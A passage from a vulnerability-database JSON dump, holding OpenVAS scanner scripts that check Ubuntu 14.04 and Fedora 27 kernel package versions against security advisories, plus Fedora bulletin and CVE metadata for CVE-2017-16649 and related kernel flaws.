"href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843824", "type": "openvas", "title": "Ubuntu Update for linux USN-3822-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3822_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for linux USN-3822-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843824\");\n script_version(\"$Revision: 14288 $\");\n script_cve_id(\"CVE-2016-9588\", \"CVE-2017-13168\", \"CVE-2017-16649\", \"CVE-2018-16658\", \"CVE-2018-9363\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-11-15 06:00:08 +0100 (Thu, 15 Nov 2018)\");\n script_name(\"Ubuntu Update for linux USN-3822-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n script_xref(name:\"USN\", value:\"3822-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3822-1/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the USN-3822-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Jim Mattson discovered that the KVM implementation in the Linux kernel\nmismanages the #BP and #OF exceptions. A local attacker in a guest virtual\nmachine could use this to cause a denial of service (guest OS crash).\n(CVE-2016-9588)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not\nproperly enforce permissions on kernel memory access. A local attacker\ncould use this to expose sensitive information or possibly elevate\nprivileges. (CVE-2017-13168)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not\nproperly validate device descriptors. A physically proximate attacker could\nuse this to cause a denial of service (system crash). (CVE-2017-16649)\n\nIt was discovered that an integer overflow existed in the CD-ROM driver of\nthe Linux kernel. A local attacker could use this to expose sensitive\ninformation (kernel memory). (CVE-2018-16658)\n\nIt was discovered that an integer overflow existed in the HID Bluetooth\nimplementation in the Linux kernel that could lead to a buffer overwrite.\nAn attacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2018-9363)\");\n\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-162-generic\", ver:\"3.13.0-162.212\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-162-generic-lpae\", ver:\"3.13.0-162.212\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-162-lowlatency\", ver:\"3.13.0-162.212\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-162-powerpc-e500\", ver:\"3.13.0-162.212\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-162-powerpc-e500mc\", ver:\"3.13.0-162.212\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-162-powerpc-smp\", ver:\"3.13.0-162.212\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-162-powerpc64-emb\", ver:\"3.13.0-162.212\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-162-powerpc64-smp\", ver:\"3.13.0-162.212\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.13.0.162.172\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"3.13.0.162.172\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"3.13.0.162.172\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500\", ver:\"3.13.0.162.172\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"3.13.0.162.172\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.13.0.162.172\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"3.13.0.162.172\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.13.0.162.172\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10021", "CVE-2018-8043", "CVE-2017-17863", "CVE-2017-17450", "CVE-2018-1108", "CVE-2017-17558", "CVE-2018-1000004", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-12193", "CVE-2017-17862", "CVE-2017-17852", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-17854", "CVE-2017-17853", "CVE-2018-7757", "CVE-2017-15115", "CVE-2017-17712", "CVE-2017-8824", "CVE-2017-17448", "CVE-2018-1065", "CVE-2017-18232", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-17449", "CVE-2017-16650", "CVE-2018-7995", "CVE-2018-5750", "CVE-2017-16538", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-16644", "CVE-2017-17864", "CVE-2018-5803", "CVE-2017-1000405", "CVE-2018-1000026", "CVE-2017-17856"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-05-02T00:00:00", "id": "OPENVAS:1361412562310874400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874400", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2018-e71875c4aa", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_e71875c4aa_kernel_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2018-e71875c4aa\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874400\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-02 16:59:02 +0530 (Wed, 02 May 2018)\");\n script_cve_id(\"CVE-2018-10021\", \"CVE-2017-18232\", \"CVE-2018-7995\", \"CVE-2018-8043\",\n \"CVE-2018-7757\", \"CVE-2018-5803\", \"CVE-2018-1065\", \"CVE-2018-1000026\",\n \"CVE-2018-5750\", \"CVE-2018-1000004\", \"CVE-2018-5344\", \"CVE-2018-5332\",\n \"CVE-2018-5333\", \"CVE-2017-17862\", \"CVE-2017-17863\", \"CVE-2017-17864\",\n \"CVE-2017-17852\", \"CVE-2017-17853\", \"CVE-2017-17854\", \"CVE-2017-17855\",\n \"CVE-2017-17856\", \"CVE-2017-17857\", \"CVE-2017-17741\", \"CVE-2017-17712\",\n \"CVE-2017-17449\", \"CVE-2017-17450\", \"CVE-2017-17448\", \"CVE-2017-17558\",\n \"CVE-2017-8824\", \"CVE-2017-1000405\", \"CVE-2017-16649\", \"CVE-2017-16650\",\n \"CVE-2017-16644\", \"CVE-2017-16647\", \"CVE-2017-15115\", \"CVE-2017-16532\",\n \"CVE-2017-16538\", \"CVE-2017-12193\", \"CVE-2018-1108\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2018-e71875c4aa\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-e71875c4aa\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/23BZYWCPCFYSPRRRVNCK6UFYCODGX6GB\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.16.4~200.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10021", "CVE-2018-8043", "CVE-2017-17863", "CVE-2017-17450", "CVE-2017-17558", "CVE-2018-1000004", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-12193", "CVE-2017-17862", "CVE-2017-17852", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-17854", "CVE-2017-17853", "CVE-2018-7757", "CVE-2017-15115", "CVE-2017-17712", "CVE-2017-8824", "CVE-2017-17448", "CVE-2018-1065", "CVE-2017-18232", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-17449", "CVE-2017-16650", "CVE-2018-7995", "CVE-2018-5750", "CVE-2017-16538", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-16644", "CVE-2017-17864", "CVE-2018-5803", "CVE-2017-1000405", "CVE-2018-1000026", "CVE-2017-17856"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-04-18T00:00:00", "id": "OPENVAS:1361412562310874366", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874366", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2018-1e033dc308", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_1e033dc308_kernel_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2018-1e033dc308\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874366\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-18 08:57:51 +0200 (Wed, 18 Apr 2018)\");\n script_cve_id(\"CVE-2018-10021\", \"CVE-2017-18232\", \"CVE-2018-7995\", \"CVE-2018-8043\",\n \"CVE-2018-7757\", \"CVE-2018-5803\", \"CVE-2018-1065\", \"CVE-2018-1000026\",\n \"CVE-2018-5750\", \"CVE-2018-1000004\", \"CVE-2018-5344\", \"CVE-2018-5332\",\n \"CVE-2018-5333\", \"CVE-2017-17862\", \"CVE-2017-17863\", \"CVE-2017-17864\",\n \"CVE-2017-17852\", \"CVE-2017-17853\", \"CVE-2017-17854\", \"CVE-2017-17855\",\n \"CVE-2017-17856\", \"CVE-2017-17857\", \"CVE-2017-17741\", \"CVE-2017-17712\",\n \"CVE-2017-17449\", \"CVE-2017-17450\", \"CVE-2017-17448\", \"CVE-2017-17558\",\n \"CVE-2017-8824\", \"CVE-2017-1000405\", \"CVE-2017-16649\", \"CVE-2017-16650\",\n \"CVE-2017-16644\", \"CVE-2017-16647\", \"CVE-2017-15115\", \"CVE-2017-16532\",\n \"CVE-2017-16538\", \"CVE-2017-12193\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2018-1e033dc308\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-1e033dc308\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SKS5SHENFBKZBNJZ5A6BMP6JNTK5D4QC\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.15.17~300.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-16994"], "description": "The kernel meta package ", "modified": "2017-12-01T09:06:53", "published": "2017-12-01T09:06:53", "id": "FEDORA:1CF5E61A25A8", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.13.16-300.fc27", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-16994"], "description": "The kernel meta package ", "modified": "2017-12-01T03:45:23", "published": "2017-12-01T03:45:23", "id": "FEDORA:1EFCC607D641", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: kernel-4.13.16-200.fc26", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-16994"], "description": "The kernel meta package ", "modified": "2017-12-02T08:03:57", "published": "2017-12-02T08:03:57", "id": "FEDORA:D668A604CC02", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: kernel-4.13.16-100.fc25", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405", "CVE-2017-12193", "CVE-2017-15115", "CVE-2017-16532", "CVE-2017-16538", "CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-17448", "CVE-2017-17449", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18232", "CVE-2017-8824", "CVE-2018-1000004", "CVE-2018-1000026", "CVE-2018-10021", "CVE-2018-1065", "CVE-2018-5332", "CVE-2018-5333", "CVE-2018-5344", "CVE-2018-5750", "CVE-2018-5803", "CVE-2018-7757", "CVE-2018-7995", "CVE-2018-8043"], "description": "The kernel meta package ", "modified": "2018-04-18T01:31:51", "published": "2018-04-18T01:31:51", "id": "FEDORA:74245604D4DA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.15.17-300.fc27", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405", "CVE-2017-12193", "CVE-2017-15115", "CVE-2017-16532", "CVE-2017-16538", "CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-17448", "CVE-2017-17449", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18232", "CVE-2017-8824", "CVE-2018-1000004", "CVE-2018-1000026", "CVE-2018-10021", "CVE-2018-1065", "CVE-2018-1108", "CVE-2018-5332", "CVE-2018-5333", "CVE-2018-5344", "CVE-2018-5750", "CVE-2018-5803", "CVE-2018-7757", "CVE-2018-7995", "CVE-2018-8043"], "description": "The kernel meta package ", "modified": "2018-04-29T05:16:13", "published": "2018-04-29T05:16:13", "id": "FEDORA:AB52460321C9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.16.4-200.fc27", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405", "CVE-2017-12193", "CVE-2017-15115", "CVE-2017-16532", "CVE-2017-16538", "CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-17448", "CVE-2017-17449", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18232", "CVE-2017-8824", "CVE-2018-1000004", "CVE-2018-1000026", "CVE-2018-10021", "CVE-2018-10322", "CVE-2018-10323", "CVE-2018-1065", "CVE-2018-1108", "CVE-2018-1120", "CVE-2018-3639", "CVE-2018-5332", "CVE-2018-5333", "CVE-2018-5344", "CVE-2018-5750", "CVE-2018-5803", "CVE-2018-7757", "CVE-2018-7995", "CVE-2018-8043"], "description": "The kernel meta package ", "modified": "2018-05-25T15:46:24", "published": "2018-05-25T15:46:24", "id": "FEDORA:08D3760E6566", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.16.11-200.fc27", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405", "CVE-2017-12193", "CVE-2017-15115", "CVE-2017-16532", "CVE-2017-16538", "CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-17448", "CVE-2017-17449", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18232", "CVE-2017-8824", "CVE-2018-1000004", "CVE-2018-1000026", "CVE-2018-10021", "CVE-2018-10322", "CVE-2018-10323", "CVE-2018-1065", "CVE-2018-10840", "CVE-2018-1108", "CVE-2018-1120", "CVE-2018-11506", "CVE-2018-3639", "CVE-2018-5332", "CVE-2018-5333", "CVE-2018-5344", "CVE-2018-5750", "CVE-2018-5803", "CVE-2018-7757", "CVE-2018-7995", "CVE-2018-8043"], "description": "The kernel meta package ", "modified": "2018-06-05T14:11:50", "published": "2018-06-05T14:11:50", "id": "FEDORA:4832F6079717", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.16.13-200.fc27", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405", "CVE-2017-12193", "CVE-2017-15115", "CVE-2017-16532", "CVE-2017-16538", "CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-17448", "CVE-2017-17449", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18232", "CVE-2017-8824", "CVE-2018-1000004", "CVE-2018-1000026", "CVE-2018-10021", "CVE-2018-10322", "CVE-2018-10323", "CVE-2018-1065", "CVE-2018-10840", "CVE-2018-10853", "CVE-2018-1108", "CVE-2018-1120", "CVE-2018-11506", "CVE-2018-3639", "CVE-2018-5332", "CVE-2018-5333", "CVE-2018-5344", "CVE-2018-5750", "CVE-2018-5803", "CVE-2018-7757", "CVE-2018-7995", "CVE-2018-8043"], "description": "The kernel meta package ", "modified": "2018-06-17T19:45:35", "published": "2018-06-17T19:45:35", "id": "FEDORA:DF5176048167", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.16.15-200.fc27", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405", "CVE-2017-12193", "CVE-2017-15115", "CVE-2017-16532", "CVE-2017-16538", "CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-17448", "CVE-2017-17449", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18232", "CVE-2017-8824", "CVE-2018-1000004", "CVE-2018-1000026", "CVE-2018-10021", "CVE-2018-10322", "CVE-2018-10323", "CVE-2018-1065", "CVE-2018-10840", "CVE-2018-1108", "CVE-2018-1120", "CVE-2018-3639", "CVE-2018-5332", "CVE-2018-5333", "CVE-2018-5344", "CVE-2018-5750", "CVE-2018-5803", "CVE-2018-7757", "CVE-2018-7995", "CVE-2018-8043"], "description": "The kernel meta package ", "modified": "2018-05-29T11:50:44", "published": "2018-05-29T11:50:44", "id": "FEDORA:E6F08605DCE7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.16.12-200.fc27", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405", "CVE-2017-12193", "CVE-2017-15115", "CVE-2017-16532", "CVE-2017-16538", "CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-17448", "CVE-2017-17449", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18232", "CVE-2017-8824", "CVE-2018-1000004", "CVE-2018-1000026", "CVE-2018-10021", "CVE-2018-10322", "CVE-2018-10323", "CVE-2018-1065", "CVE-2018-10840", "CVE-2018-10853", "CVE-2018-1108", "CVE-2018-1120", "CVE-2018-11506", "CVE-2018-12232", "CVE-2018-3639", "CVE-2018-5332", "CVE-2018-5333", "CVE-2018-5344", "CVE-2018-5750", "CVE-2018-5803", "CVE-2018-7757", "CVE-2018-7995", "CVE-2018-8043"], "description": "The kernel meta package ", "modified": "2018-06-22T14:12:17", "published": "2018-06-22T14:12:17", "id": "FEDORA:10F7D6255145", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.16.16-200.fc27", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:36:39", "description": "The usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device.", "edition": 6, "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.6, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": 